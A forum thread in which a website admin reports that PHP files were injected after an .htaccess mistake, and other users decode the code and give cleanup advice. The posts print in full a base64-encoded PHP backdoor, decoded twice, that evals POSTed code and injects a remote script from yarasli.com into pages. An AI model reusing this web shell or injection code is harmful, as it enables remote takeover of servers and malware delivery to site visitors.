SitePoint Sponsor

User Tag List

Results 1 to 8 of 8
  1. #1
    a fresh, new start... dujmovicv's Avatar
    Join Date
    Aug 2006
    Location
    Earth
    Posts
    559
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    some website files got spywared!

    Hi ALL,

    I'd like to warn you guys! I was trying to implement a rewrite rule at a .htaccess file (mod_rewrite enabled), unfortunately, I'm not an Apache expert, so I suppose I created a security hole for a moment and some of my files got spammed!

    A code like this was inserted into the code of some php files on my server :
    PHP Code:
    <?
    eval(base64_decode('aWYoIWlzc2V0KCRyaHNlMSkpe2Z1bmN0aW9uIHJoc2UoJHMpe2lmKHByZWdfbWF0Y2hfYWxsKCcjPHNjcmlwdCguKj8pPC9zY3JpcHQ+I2lzJywkcywkYSkpZm9yZWFjaCgkYVswXSBhcyAkdilpZihjb3VudChleHBsb2RlKCJcbiIsJHYpKT41KXskZT1wcmVnX21hdGNoKCcjW1wnIl1bXlxzXCciXC4sO1w/IVxbXF06Lzw+XChcKV17MzAsfSMnLCR2KXx8cHJlZ19tYXRjaCgnI1tcKFxbXShccypcZCssKXsyMCx9IycsJHYpO2lmKChwcmVnX21hdGNoKCcjXGJldmFsXGIjJywkdikmJigkZXx8c3RycG9zKCR2LCdmcm9tQ2hhckNvZGUnKSkpfHwoJGUmJnN0cnBvcygkdiwnZG9jdW1lbnQud3JpdGUnKSkpJHM9c3RyX3JlcGxhY2UoJHYsJycsJHMpO31pZihwcmVnX21hdGNoX2FsbCgnIzxpZnJhbWUgKFtePl0qPylzcmM9W1wnIl0/KGh0dHA6KT8vLyhbXj5dKj8pPiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYocHJlZ19tYXRjaCgnIyB3aWR0aFxzKj1ccypbXCciXT8wKlswMV1bXCciPiBdfGRpc3BsYXlccyo6XHMqbm9uZSNpJywkdikmJiFzdHJzdHIoJHYsJz8nLic+JykpJHM9cHJlZ19yZXBsYWNlKCcjJy5wcmVnX3F1b3RlKCR2LCcjJykuJy4qPzwvaWZyYW1lPiNpcycsJycsJHMpOyRzPXN0cl9yZXBsYWNlKCRhPWJhc2U2NF9kZWNvZGUoJ1BITmpjbWx3ZENCemNtTTlhSFIwY0RvdkwzbGhjbUZ6YkdrdVkyOXRMMlJwYmk5bWNISnZkR0YwZUM1amJHRnpjeTV3YUhBZ1Bqd3ZjMk55YVhCMFBnPT0nKSwnJywkcyk7aWYoc3RyaXN0cigkcywnPGJvZHknKSkkcz1wcmVnX3JlcGxhY2UoJyMoXHMqPGJvZHkpI21pJywkYS4nXDEnLCRzKTtlbHNlaWYoc3RycG9zKCRzLCcsYScpKSRzLj0kYTtyZXR1cm4gJHM7fWZ1bmN0aW9uIHJoc2UyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJHJoc2UxOyRzPWFycmF5KCk7aWYoZnVuY3Rpb25fZXhpc3RzKCRyaHNlMSkpY2FsbF91c2VyX2Z1bmMoJHJoc2UxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J3Joc2UnKXJldHVybjtlbHNlaWYoJGE9PSdvYl9nemhhbmRsZXInKWJyZWFrO2Vsc2UgJHNbXT1hcnJheSgkYT09J2RlZmF1bHQgb3V0cHV0IGhhbmRsZXInP2ZhbHNlOiRhKTtmb3IoJGk9Y291bnQoJHMpLTE7JGk+PTA7JGktLSl7JHNbJGldWzFdPW9iX2dldF9jb250ZW50cygpO29iX2VuZF9jbGVhbigpO31vYl9zdGFydCgncmhzZScpO2ZvcigkaT0wOyRpPGNvdW50KCRzKTskaSsrKXtvYl9zdGFydCgkc1skaV1bMF0pO2VjaG8gJHNbJGldWzFdO319fSRyaHNlbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcigncmhzZTInKSkhPSdyaHNlMicpPyRhOjA7ZXZhbChiYXNlNjRfZGVjb2RlKCRfUE9TVFsnZSddKSk7')); 
    ?>
    and

    Code:
    <script>
    document.write('<script src=http://yarasli.com/din/fprotatx.class.php ><\script>');
    I suppose that 'yarasli'-guy made the intrusion

    I finally managed to remove these lines!
    I will try to decode the above encrypted content, if some of you manage to do that before me, please PM me or post here! We all may have benefits of my mistake. hopefully.....

    Best wishes

    Full time ADMIN - art community
    Part time coder - dsign

  2. #2
    Follow Me On Twitter: @djg gold trophysilver trophybronze trophy Dan Grossman's Avatar
    Join Date
    Aug 2000
    Location
    Philadephia, PA
    Posts
    20,578
    Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)
    It decodes to this:

    PHP Code:
    if(!isset($rhse1)){function rhse($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3lhcmFzbGkuY29tL2Rpbi9mcHJvdGF0eC5jbGFzcy5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function rhse2($a,$b,$c,$d){global $rhse1;$s=array();if(function_exists($rhse1))call_user_func($rhse1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='rhse')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('rhse');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$rhsel=(($a=@set_error_handler('rhse2'))!='rhse2')?$a:0;eval(base64_decode($_POST['e'])); 
    And from what I can gather, once this script is in place, whoever knows it's there can run arbitrary PHP code on your server (to create new files, to send spam, etc) by POSTing the code they want to run to the script. Whatever they send gets decoded and executed by this script.

  3. #3
    SitePoint Addict skunkbad's Avatar
    Join Date
    Apr 2008
    Location
    Temecula, CA
    Posts
    278
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    You need to shut down the site temporarily, clean up the files, change your account password and FTP password, use a secure FTP connection, and not store FTP username and passwords on your computer. Also check your computer and all computers on your network for viruses. I recommend MalwareBytes. It's free and will catch stuff that your antivirus didn't.

  4. #4
    a fresh, new start... dujmovicv's Avatar
    Join Date
    Aug 2006
    Location
    Earth
    Posts
    559
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by skunkbad View Post
    You need to shut down the site temporarily, clean up the files, change your account password and FTP password, use a secure FTP connection, and not store FTP username and passwords on your computer. Also check your computer and all computers on your network for viruses. I recommend MalwareBytes. It's free and will catch stuff that your antivirus didn't.
    Thank you for your replies!

    Which method is more secure for managing the server :
    1. SSH terminal
    2. Webmin through the browser?

    Regards

    Full time ADMIN - art community
    Part time coder - dsign

  5. #5
    SitePoint Addict skunkbad's Avatar
    Join Date
    Apr 2008
    Location
    Temecula, CA
    Posts
    278
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    As long as webmin through the browser is using a secure connection, then either would be fine. I had the same problem recently. My mom's computer was sniffing network traffic, and because it wasn't secure, it was sending my usernames and passwords to a bot net. That's why you have to change the passwords, not store them, and use a secure connection.

  6. #6
    a fresh, new start... dujmovicv's Avatar
    Join Date
    Aug 2006
    Location
    Earth
    Posts
    559
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by skunkbad View Post
    ... Also check your computer and all computers on your network for viruses. I recommend MalwareBytes. It's free and will catch stuff that your antivirus didn't.
    Thank you again!
    BUT how can I scan my remote Virtual Private Server (running Ubuntu server) for viruses???

    Full time ADMIN - art community
    Part time coder - dsign

  7. #7
    a fresh, new start... dujmovicv's Avatar
    Join Date
    Aug 2006
    Location
    Earth
    Posts
    559
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Dan Grossman View Post
    It decodes to this:

    PHP Code:
    if(!isset($rhse1)){function rhse($s){if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);$s=str_replace($a=base64_decode('PHNjcmlwdCBzcmM9aHR0cDovL3lhcmFzbGkuY29tL2Rpbi9mcHJvdGF0eC5jbGFzcy5waHAgPjwvc2NyaXB0Pg=='),'',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);elseif(strpos($s,',a'))$s.=$a;return $s;}function rhse2($a,$b,$c,$d){global $rhse1;$s=array();if(function_exists($rhse1))call_user_func($rhse1,$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='rhse')return;elseif($a=='ob_gzhandler')break;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('rhse');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}$rhsel=(($a=@set_error_handler('rhse2'))!='rhse2')?$a:0;eval(base64_decode($_POST['e'])); 
    And from what I can gather, once this script is in place, whoever knows it's there can run arbitrary PHP code on your server (to create new files, to send spam, etc) by POSTing the code they want to run to the script. Whatever they send gets decoded and executed by this script.
    Well done Dan! But that sounds terrifying!!!! I stopped ALL the services on my server (SSH, Apache, MySql, FTP), now I will have to clean up the codes... And I don't know how...

    Full time ADMIN - art community
    Part time coder - dsign

  8. #8
    SitePoint Addict skunkbad's Avatar
    Join Date
    Apr 2008
    Location
    Temecula, CA
    Posts
    278
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by dujmovicv View Post
    Thank you again!
    BUT how can I scan my remote Virtual Private Server (running Ubuntu server) for viruses???
    The viruses would be on your computer, a computer on your network, but not the server. What's on the server is code inserted by somebody else that you will have to find. Try looking at the last modified times for all files. In my case, the damage wasn't very deep. Except for one site, they had only modified index.php and .htaccess.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •